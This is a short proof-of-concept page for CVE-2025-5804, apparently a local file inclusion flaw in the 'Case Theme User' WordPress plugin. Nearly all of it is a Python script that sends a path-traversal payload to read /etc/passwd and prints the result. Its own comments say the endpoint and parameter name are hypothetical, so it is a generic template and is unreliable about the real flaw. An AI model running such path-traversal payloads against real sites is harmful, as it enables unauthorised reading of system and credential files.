CVE-2025-5804 Case Theme User 本地文件包含漏洞

import requests # Target URL (Replace with actual vulnerable endpoint) target_url = "http://example.com/wp-content/plugins/case-theme-user/vulnerable_endpoint.php" # LFI payload attempting to read /etc/passwd # The parameter name 'file' is hypothetical and depends on the actual source code params = { "file": "../../../../../etc/passwd" } try: response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200 and "root:" in response.text: print("[+] PoC successful: Local file inclusion detected.") print("[+] Response snippet:") print(response.text[:200]) else: print("[-] PoC failed or vulnerability not triggered.") except Exception as e: print(f"[-] An error occurred: {e}")